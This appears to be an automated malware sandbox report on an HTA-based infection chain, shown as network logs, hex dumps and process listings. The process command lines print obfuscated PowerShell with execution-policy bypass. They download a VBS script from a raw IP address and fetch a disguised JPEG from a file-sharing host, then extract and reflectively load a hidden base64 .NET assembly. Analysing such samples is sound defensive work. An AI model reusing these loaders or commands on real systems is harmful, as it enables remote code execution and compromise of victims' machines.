2024-11-18 17:37:25 UTC	192	OUT	GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1 Host: 1017.filemail.com Connection: Keep-Alive
2024-11-18 17:37:25 UTC	324	IN	HTTP/1.1 200 OK Content-Length: 2230233 Content-Type: image/jpeg Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT Accept-Ranges: bytes ETag: 4bb5a8185f3b16880e3dcc573015c5d9 X-Transfer-ID: wxhdiueivoluihj Content-Disposition: attachment; filename=new_imagem.jpg Date: Mon, 18 Nov 2024 17:37:25 GMT Connection: close
2024-11-18 17:37:25 UTC	639	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
2024-11-18 17:37:25 UTC	8192	IN	Data Raw: 16 4f de a3 82 3a 1f 71 97 33 6e 16 1b 33 f4 cc 56 6d 8a 6d 1b bf b1 f7 c6 d8 50 e1 af 02 ac c1 af d4 6f e1 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 Data Ascii: O:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>u
2024-11-18 17:37:26 UTC	8192	IN	Data Raw: a9 fc 58 e9 fb 5f a6 50 2b 4c e5 7a 13 79 e1 bc 42 2a 61 a9 8d 02 c8 a6 d9 47 42 31 cd 36 a9 75 11 2d 46 a2 c7 3f 3c 0f 58 df 6c 34 ca 50 9d 34 84 31 03 82 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b Data Ascii: X_P+LzyB*aGB16u-F?<Xl4P411Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQ
2024-11-18 17:37:26 UTC	8192	IN	Data Raw: 73 47 3c 5a 69 01 28 d2 28 01 85 90 db 85 1c b4 ce 91 78 56 99 24 2c d1 cc 01 6e 6f 69 1d 19 6f a7 c7 dc 58 c6 f5 7a 00 be 27 a4 d4 c6 86 9a 64 0c 07 66 dc 39 cb c9 a0 fb e7 84 c4 81 4e e5 1b 85 9a e7 a6 07 43 a8 95 34 e9 b7 4f 24 aa 16 96 45 60 55 be 3f eb a6 0b 5a 27 d5 a4 4a ba 49 54 ac 81 ad aa bf 9e 2b a2 d6 cd e1 c1 a3 91 19 94 1f c2 7a fd 0e 69 b6 b2 49 d5 0e 8e 16 70 dc 6f 7f 48 46 f8 df 24 8f 87 18 04 d5 43 f7 88 5e 06 ea ca 05 76 1f 2f ae 62 f8 53 24 5a a9 74 d3 00 55 bd 2d 7e e3 3d 1a 21 da 03 b6 e9 07 0c f5 41 8f bd 66 1f 8d e8 ca 6a a3 9a 2b b9 78 35 fe 2c 05 7c 4c ed f1 26 9a 14 20 2d 29 6e c5 80 cd 4d 4e af ef 1a 14 58 da de 62 b1 11 57 57 d7 f4 bc 28 d0 2b 78 59 d3 85 3b b6 ee 27 be ec cf f0 4d 37 9d 2b cf 28 65 55 b5 5f 89 3d 70 0f e2 7e Data Ascii: sG<Zi((xV$,noioXz'df9NC4O$E`U?Z'JIT+ziIpoHF$C^v/bS$ZtU-~=!Afj+x5,\|L& -)nMNXbWW(+xY;'M7+(eU_=p~
2024-11-18 17:37:26 UTC	8192	IN	Data Raw: 84 f0 b8 1e 38 76 4c fe 64 80 f2 d8 64 91 11 58 94 01 ae 81 cb 19 50 2b 2c 67 69 23 93 80 2d 58 52 a6 9c 1f 7f 86 66 1d 1d 9d ea bc 83 7d 73 58 40 8d a5 66 0b 76 7d 47 f5 ca 26 c7 8c 00 08 6c 0c e9 a2 7d a5 89 da aa 39 38 b8 96 17 50 c9 ea 03 82 73 48 2a 89 7c a6 b3 b8 1e 09 ed 99 b3 7d da 09 8c 01 42 1b fa 1c 0b ba 24 cb b4 8d ca 45 10 30 fe 1b a3 d1 e8 61 91 84 0c 4b 1e 2f 11 96 55 82 45 04 b0 07 fc 38 d3 ea 01 41 6e 18 01 7c 9a c0 68 bc 45 b7 1a 15 c5 7b 65 a2 d4 04 63 74 c0 f6 1d b3 ce 1d 54 81 da f6 f9 7b ac 35 e3 e9 31 7d 2e fa 3c 9e 08 f6 c0 d9 97 56 86 12 80 1d c4 fe 98 21 b1 95 81 1b 7d f9 cc bd 33 ec 60 f2 16 66 e6 af 18 32 a9 52 24 46 65 f7 5e 30 2d 22 33 31 55 a0 7b 5e 02 5d 14 2f 3a 4e d6 1d 78 f6 c7 06 a3 49 ba 34 24 af 14 09 e0 e2 5a f9 03 Data Ascii: 8vLddXP+,gi#-XRf}sX@fv}G&l}98PsH*\|}B$E0aK/UE8An\|hE{ectT{51}.<V!}3`f2R$Fe^0-"31U{^]/:NxI4$Z
2024-11-18 17:37:26 UTC	8192	IN	Data Raw: 2d 1a fe 99 63 aa 8d c1 56 4d b1 88 c2 85 dc 6c 8d e1 bf 3a bc 0b 18 1c d7 98 51 4e e6 46 b6 a0 0a 80 49 bf 91 ed d7 2a f1 d3 aa 89 e3 f2 ca d8 76 63 b4 8b 22 ea b7 75 1e df a6 5b ef ec ab 13 ef 62 e8 ce 02 86 e5 54 80 3a d7 5e bc fc 32 1f 5e 5b 50 1d bc dd bb 36 13 e6 5b 91 77 7b 88 eb 7f 0c 01 3e 95 81 62 ce 81 57 69 df c9 0d 62 c5 71 7d 31 76 52 8c 57 8b 06 ac 1b 07 e4 71 93 a9 2d 2b 3d b8 b0 a0 53 d1 a0 28 59 ae 78 eb 8a c8 db dc b5 01 66 e8 60 42 b1 53 db eb 8c 0d 58 1a 72 a0 11 26 e5 20 8f 86 29 59 60 0d f0 09 af 6c 07 91 fc c8 42 31 a5 2b ea 3d ee ce 74 92 9f dd b0 ad aa 45 f3 c9 ae f8 b8 67 0a 77 21 3e dc 64 32 32 a8 a4 60 7a f2 0e 07 3c 8e cc c1 d8 8b 37 59 42 f6 e4 9e 87 82 3e 19 c4 33 35 01 cf b6 0e b0 24 d5 9a e9 86 64 8d 61 1c fa c8 bc 0f 17 Data Ascii: -cVMl:QNFI*vc"u[bT:^2^[P6[w{>bWibq}1vRWq-+=S(Yxf`BSXr& )Y`lB1+=tEgw!>d22`z<7YB>35$da
2024-11-18 17:37:26 UTC	8192	IN	Data Raw: b6 37 3c 0e 2f df 01 dd 73 01 10 00 a8 07 af ca b8 c8 48 d1 b6 85 0a 48 27 a7 d3 32 e5 97 cd 51 e6 3b 32 dd b0 1d 87 ab 02 de 27 24 5b 44 55 43 d5 cf b9 e7 03 74 2a aa 95 63 6a a7 f2 c2 a3 23 46 50 6e da 07 f1 66 76 9b c4 7c ed 31 92 4b 56 e7 81 d0 e1 d3 58 8f 28 2a db 81 2d 75 80 d9 58 d0 2a d1 db d8 0e d9 49 65 81 94 24 85 95 6f 83 ee 70 32 ea d2 2d ab 4c 4b 1b b2 6a ab 9c c5 d6 6a 53 57 3a b0 bd 8b 64 d7 bd fb e0 6e 18 a0 a0 6d 8f 73 5f fb 61 20 f2 a3 06 81 3d f9 cc f3 ab 48 36 69 82 ee 3b 40 06 e8 1b f7 3f 4c 13 eb 80 89 dc ae d9 15 b6 95 bb ba f6 c0 d9 65 8d ad e3 34 73 3d d2 29 26 20 8b 6e f8 01 e2 05 a3 42 b1 b3 16 52 6a e8 81 5e ff 00 3c e4 d4 00 c7 85 32 16 02 83 7b fb 9c 03 0d 24 28 c6 e9 80 f7 ed 78 bc fa 18 8c ca e7 71 17 54 b9 0f ac 1b 83 14 Data Ascii: 7</sHH'2Q;2'$[DUCtcj#FPnfv\|1KVX(-uX*Ie$op2-LKjjSW:dnms_a =H6i;@?Le4s=)& nBRj^<2{$(xqT
2024-11-18 17:37:26 UTC	8192	IN	Data Raw: 59 65 1f bb 65 16 2d 8f 40 2f 0f 13 b2 4f 20 3b 5a 36 20 a8 03 f0 e5 a7 4d 3b 15 69 54 b1 07 8e 4d 7e 58 08 eb e7 75 68 a5 89 9b a1 04 0e 99 68 e6 f3 16 37 da 49 27 d4 6f a6 76 aa 54 dc ca 16 a8 75 ed 58 1d 3d 2b 02 41 da c3 70 38 0e 86 0a d5 64 8a ae 7b 62 fa bd 26 9d 50 01 e8 76 3c 5f ce b0 e8 51 99 49 1d 3a de 2d aa 85 4b aa bb 82 cd b8 86 07 e3 60 60 02 28 0a c6 c5 18 6f 3c 02 46 1e 0f bd 2d b0 95 57 8f 51 61 75 f2 c0 2b 6d 50 a5 85 8e 06 14 ca ef b6 48 d3 cc 45 e1 80 ef 80 be a1 c6 f2 44 cd 23 7f 13 55 0c b8 87 ef 30 6f f3 37 3a fe 36 6f e1 15 c0 fd 31 80 cb 3e 95 d9 90 96 e6 d4 59 2b 5f 4c 8d 3e 9b cc 88 c6 d1 b2 8e 08 23 f8 8f 3c 1f cf 01 38 b4 92 ca 8d 22 ad c6 ad 4c c0 74 fa 63 92 f8 7c 91 42 25 56 5f 34 1b 35 c5 8f ae 37 16 89 3c b3 e5 93 1d d6 Data Ascii: Yee-@/O ;Z6 M;iTM~Xuhh7I'ovTuX=+Ap8d{b&Pv<_QI:-K``(o<F-WQau+mPHED#U0o7:6o1>Y+_L>#<8"Ltc\|B%V_457<
2024-11-18 17:37:26 UTC	8192	IN	Data Raw: da 4a 89 99 cb 2b 75 da 3a 1b 38 02 11 fd 2b 16 d2 3b 86 c7 c8 6d 56 e4 6b dc 3a 73 f0 cc e2 a5 1b 69 5d ac 0f 52 70 19 87 4e 62 60 d6 08 3c df b6 5e 59 91 66 13 8a ae 85 7e 38 00 ee b1 96 00 a8 3d ba de 14 b2 ea 08 25 02 80 a0 0d bf cf 00 b1 29 d4 28 99 81 dc 5a c5 74 19 b5 11 66 8a eb d5 54 05 d6 62 a4 ab 0c 24 00 59 41 eb 7c fe 58 f6 9b 5d 14 90 96 16 a0 76 f7 c0 6e 68 d0 1d c4 fa ea 82 d5 de 79 fd 6c 32 b6 a5 89 00 9f 6f 6f 86 69 b6 a1 8c bb de cb 11 42 bb 0c 09 65 72 50 de f1 cd 9e b8 06 f0 d8 a2 68 e3 47 3e a1 7b 8e 06 78 55 1c ed ad a0 9e 3d f0 70 bb 69 75 25 94 1d b6 3a e3 be 22 bb 22 12 a8 52 cd db be 02 10 0f 2e 46 2e 40 04 8e 0e 6c 31 41 08 75 a2 2b 9f 86 64 40 06 ab d1 2f a5 af bf cb 1d 87 f7 7f b9 0f 6b da fa 1c 05 25 77 9a 62 a4 12 28 f2 38 Data Ascii: J+u:8+;mVk:si]RpNb`<^Yf~8=%)(ZtfTb$YA\|X]vnhyl2ooiBerPhG>{xU=piu%:""R.F.@l1Au+d@/k%wb(8
2024-11-18 17:37:26 UTC	8192	IN	Data Raw: a4 ed 37 b6 db a8 bc 0b 48 fe 74 ea cd b8 0d 8a a4 81 67 d2 a0 74 fa 65 b5 33 99 ac 91 cb 4a f2 13 5f e2 af ed 95 43 e6 b1 34 14 01 6c cc 49 00 74 ec 2f 2c d0 10 cc 19 91 6a ad bd 55 64 58 1f 90 c0 34 2c 16 25 76 65 1b 21 78 c7 a9 4f e2 0d da ef f8 bd b2 af 3a b4 6f 45 b7 49 1a c6 41 1c 0d a5 45 83 7c fe 1f 6c 08 57 59 4c 3b 6d f7 6d f9 1e 9e df 2c b8 08 b0 c6 41 52 59 d8 16 2d c5 00 2b b5 fb e0 19 f5 8c d2 bb 38 a5 64 da 49 50 d4 4b 6e 3c 1e 3a de 2f 2c de 64 52 2d 13 b9 94 82 00 1c 28 23 a0 f9 e4 59 95 ca aa 96 a2 05 8b 3d fe 23 f9 e1 b4 eb 10 59 84 b2 aa 3a a8 d8 39 a2 d6 2f a0 f6 be e3 9c 00 49 21 97 51 23 10 55 5d f7 11 ed c9 fe f9 64 90 a2 c2 42 8d e9 21 72 48 ab e8 47 f2 39 3b 90 91 7b ac 9e 7e 1f 2c 63 4e 9e 63 0d d1 17 24 f0 c5 88 51 b7 d4 db a8 Data Ascii: 7Htgte3J_C4lIt/,jUdX4,%ve!xO:oEIAE\|lWYL;mm,ARY-+8dIPKn<:/,dR-(#Y=#Y:9/I!Q#U]dB!rHG9;{~,cNc$Q

Target ID:	0
Start time:	12:37:10
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta"
Imagebase:	0x7c0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	12:37:11
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
Imagebase:	0x410000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:37:11
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:37:12
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe
Imagebase:	0x410000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:37:15
Start date:	18/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline"
Imagebase:	0x20000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:37:16
Start date:	18/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES60DC.tmp" "c:\Users\user\AppData\Local\Temp\tnaq44gy\CSCA55E465C63A145CC9DC9276A53775DB5.TMP"
Imagebase:	0x8b0000
File size:	46'832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:37:20
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestnetworkwhichgivebestthingsentirelifewith.vbS"
Imagebase:	0xda0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:37:21
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Imagebase:	0x410000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:37:21
Start date:	18/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:37:21
Start date:	18/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','\|').rEPlaCE('seY','$')\| . ((gV 'Mdr').nAmE[3,11,2]-jOIN'')"
Imagebase:	0x410000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

